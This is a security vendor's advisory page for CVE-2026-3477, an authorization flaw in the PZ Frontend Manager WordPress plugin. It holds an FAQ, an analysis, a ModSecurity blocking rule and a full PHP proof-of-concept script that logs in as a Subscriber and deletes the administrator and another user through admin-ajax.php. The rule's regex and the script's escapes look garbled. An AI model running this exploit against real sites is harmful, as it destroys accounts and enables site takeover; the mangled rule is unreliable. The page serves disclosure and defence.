What is CVE-2026-3477?

CVE-2026-3477 is a security vulnerability in the PZ Frontend Manager plugin for WordPress, affecting versions up to and including 1.0.6. It involves a missing authorization check that allows authenticated users with Subscriber-level access to delete arbitrary WordPress users.

How does this vulnerability work?

The vulnerability arises from the pzfm_user_request_action_callback() function, which does not verify user capabilities or nonce values when handling requests to delete users. An attacker can manipulate the ‘dataType’ parameter to execute the deletion of user accounts without proper authorization.

Who is affected by CVE-2026-3477?

Any WordPress site using the PZ Frontend Manager plugin version 1.0.6 or earlier is at risk. This includes sites where authenticated users have at least Subscriber privileges, allowing them to exploit the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the PZ Frontend Manager plugin installed. If it is version 1.0.6 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify any low-privilege users.

What are the practical risks of this vulnerability?

The practical risks include the potential for an attacker to delete all users on the site, including administrators. This can lead to a complete loss of administrative access, site takeover, and significant data loss, despite the Medium CVSS score.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the PZ Frontend Manager plugin to the latest version that addresses the issue. Additionally, implement capability checks and nonce verification in the pzfm_user_request_action_callback() function to prevent unauthorized user deletions.

What does the CVSS score of 5.3 indicate?

The CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that it is exploitable but requires some level of authentication. However, the actual impact can be severe, as it allows low-privilege users to perform critical actions.

What is the proof of concept for this vulnerability?

The proof of concept demonstrates how an authenticated user with Subscriber access can send a crafted AJAX request to the WordPress site to delete users. It highlights the lack of authorization checks and shows the ease of exploiting this oversight.

What steps should I take after applying a fix?

After applying a fix, monitor user activity closely to detect any unauthorized actions. Additionally, review user roles and permissions to ensure that no unnecessary privileges are granted to low-level users.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, implement strict access control measures, including capability checks and nonce verification for all AJAX requests. Regularly audit plugins for security issues and keep them updated to the latest versions.

Where can I find more information about CVE-2026-3477?

More information about CVE-2026-3477 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security forums. Additionally, consulting the plugin’s official documentation may provide insights into security practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2026-3477: PZ Frontend Manager <= 1.0.6 – Missing Authorization to Arbitrary User Deletion via 'dataType' Parameter (pz-frontend-manager)

CVE ID CVE-2026-3477

Plugin pz-frontend-manager

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 1.0.6

Patched Version —

Disclosed April 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3477 (metadata-based): The PZ Frontend Manager plugin for WordPress, version 1.0.6 and earlier, contains a missing authorization vulnerability in its AJAX handler for user request actions. This allows authenticated attackers with Subscriber-level access or above to delete arbitrary WordPress users, including administrators. The CVSS score is 5.3 (Medium), with a vector indicating network-based exploitation, low complexity, no privileges required, and no user interaction.

The root cause is a missing authorization check in the pzfm_user_request_action_callback() function. This function is registered via the wp_ajax_pzfm_user_request_action AJAX hook. The function handles user activation, deactivation, and deletion operations based on the ‘dataType’ parameter. When ‘dataType’ is set to ‘delete’, the function calls wp_delete_user() on provided user IDs without any capability or nonce verification. Atomic Edge analysis infers from the CWE classification (CWE-862 Missing Authorization) and the description that the code path for deletion does not call the pzfm_can_delete_user() function, which is used in the similar pzfm_remove_item_callback() function. This is a confirmed oversight based on the description, though no source code diff is available.

Exploitation requires an authenticated WordPress session with at least Subscriber privileges. The attacker sends a POST request to /wp-admin/admin-ajax.php with action=pzfm_user_request_action, dataType=delete, and user_ids[] containing the target user IDs. The attacker does not need a nonce or any special capabilities. The request triggers wp_delete_user() for each ID without verifying the current user’s permissions. Atomic Edge analysis notes that this enables a low-privilege user to delete any account, including administrators, thereby achieving account takeover and site compromise.

Remediation requires implementing capability checks in pzfm_user_request_action_callback() before performing any user operation. The function should call current_user_can() with an appropriate capability such as ‘delete_users’ or ‘manage_options’. Additionally, the function should verify a nonce using check_ajax_referer() to prevent cross-site request forgery. Atomic Edge analysis recommends validating that the current user has the capability to delete each target user or at least has the general ‘delete_users’ capability. The patch should mirror the authorization logic already present in pzfm_remove_item_callback(), which uses pzfm_can_delete_user().

The impact of successful exploitation is severe. An attacker with Subscriber-level access can delete all users on the WordPress site, including administrators. This results in complete loss of administrative access, potential site takeover, and data loss. Atomic Edge research classifies this as a critical access control failure despite the Medium CVSS score, because the actual impact on site operations and security can be catastrophic. The vulnerability requires authentication but imposes no privilege requirements beyond the minimum Subscriber level.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" "id:20263477,phase:2,deny,status:403,chain,msg:'CVE-2026-3477 PZ Frontend Manager user deletion via AJAX',severity:'CRITICAL',tag:'CVE-2026-3477'"
SecRule ARGS_POST:action "@streq pzfm_user_request_action" "chain"
SecRule ARGS_POST:dataType "@streq delete" "chain"
SecRule ARGS_POST:user_ids "@rx ^d+$" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3477 - PZ Frontend Manager <= 1.0.6 - Missing Authorization to Arbitrary User Deletion via 'dataType' Parameter

/*
 * This proof-of-concept demonstrates exploitation of the missing authorization vulnerability
 * in the PZ Frontend Manager plugin. It requires valid WordPress credentials with at least
 * Subscriber-level access. The script sends a crafted AJAX request to delete all users
 * (including administrators) by exploiting the pzfm_user_request_action_callback() function.
 *
 * Assumptions:
 * - The target WordPress site has PZ Frontend Manager plugin version <= 1.0.6 installed and active.
 * - The attacker has valid login credentials (username and password) with Subscriber role or higher.
 * - The AJAX endpoint is accessible at /wp-admin/admin-ajax.php.
 * - No nonce or capability checks exist for the user deletion operation.
 */

// Configuration - modify these values before running
$target_url = 'https://example.com';  // Base URL of the WordPress site (no trailing slash)
$username   = 'attacker';            // WordPress username with Subscriber access or higher
$password   = 'attacker_password';   // Corresponding password

// Step 1: Authenticate and get cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log'     => $username,
    'pwd'     => $password,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log In'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies_cve_2026_3477.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$login_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200 && $http_code !== 302) {
    die("[-] Login failed. HTTP code: $http_code. Check credentials or URL.n");
}
echo "[+] Successfully logged in as $username.n";

// Step 2: Fetch the list of all users (requires admin, but we just want to demonstrate deletion of a few known IDs)
// For this PoC, we target user IDs 1 (typically admin) and the current user as demonstration.
// In a real attack, the attacker would enumerate users via other means or target specific IDs.
// Here we send a request to delete user ID 1 (admin) and user ID 2 (or another known user).

$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Prepare the malicious AJAX request
$payload = array(
    'action'     => 'pzfm_user_request_action',
    'dataType'   => 'delete',
    'user_ids[]' => array(1, 2)  // Targeting admin (ID 1) and another user (ID 2)
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies_cve_2026_3477.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');
$ajax_response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "[+] Sent exploit request to $ajax_urln";
echo "[+] HTTP Response Code: $http_coden";
echo "[+] Response Body: $ajax_responsen";

if ($http_code == 200 && strpos($ajax_response, 'success') !== false) {
    echo "[!] Exploit may have succeeded. Check target site for deleted users.n";
} else {
    echo "[-] Exploit did not return success. May not be vulnerable.n";
}

// Clean up cookie file
if (file_exists('/tmp/cookies_cve_2026_3477.txt')) {
    unlink('/tmp/cookies_cve_2026_3477.txt');
}
?>

Frequently Asked Questions

What is CVE-2026-3477?
Overview of the vulnerability
CVE-2026-3477 is a security vulnerability in the PZ Frontend Manager plugin for WordPress, affecting versions up to and including 1.0.6. It involves a missing authorization check that allows authenticated users with Subscriber-level access to delete arbitrary WordPress users.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the pzfm_user_request_action_callback() function, which does not verify user capabilities or nonce values when handling requests to delete users. An attacker can manipulate the ‘dataType’ parameter to execute the deletion of user accounts without proper authorization.
Who is affected by CVE-2026-3477?
Identifying impacted users
Any WordPress site using the PZ Frontend Manager plugin version 1.0.6 or earlier is at risk. This includes sites where authenticated users have at least Subscriber privileges, allowing them to exploit the vulnerability.
How can I check if my site is vulnerable?
Steps to assess vulnerability
To check if your site is vulnerable, verify the version of the PZ Frontend Manager plugin installed. If it is version 1.0.6 or earlier, your site is susceptible to this vulnerability. Additionally, review user roles to identify any low-privilege users.
What are the practical risks of this vulnerability?
Impact of exploitation
The practical risks include the potential for an attacker to delete all users on the site, including administrators. This can lead to a complete loss of administrative access, site takeover, and significant data loss, despite the Medium CVSS score.
How can I mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the PZ Frontend Manager plugin to the latest version that addresses the issue. Additionally, implement capability checks and nonce verification in the pzfm_user_request_action_callback() function to prevent unauthorized user deletions.
What does the CVSS score of 5.3 indicate?
Understanding the severity rating
The CVSS score of 5.3 indicates a medium severity vulnerability, suggesting that it is exploitable but requires some level of authentication. However, the actual impact can be severe, as it allows low-privilege users to perform critical actions.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept demonstrates how an authenticated user with Subscriber access can send a crafted AJAX request to the WordPress site to delete users. It highlights the lack of authorization checks and shows the ease of exploiting this oversight.
What steps should I take after applying a fix?
Post-remediation actions
After applying a fix, monitor user activity closely to detect any unauthorized actions. Additionally, review user roles and permissions to ensure that no unnecessary privileges are granted to low-level users.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, implement strict access control measures, including capability checks and nonce verification for all AJAX requests. Regularly audit plugins for security issues and keep them updated to the latest versions.
Where can I find more information about CVE-2026-3477?
Resources for further reading
More information about CVE-2026-3477 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security forums. Additionally, consulting the plugin’s official documentation may provide insights into security practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations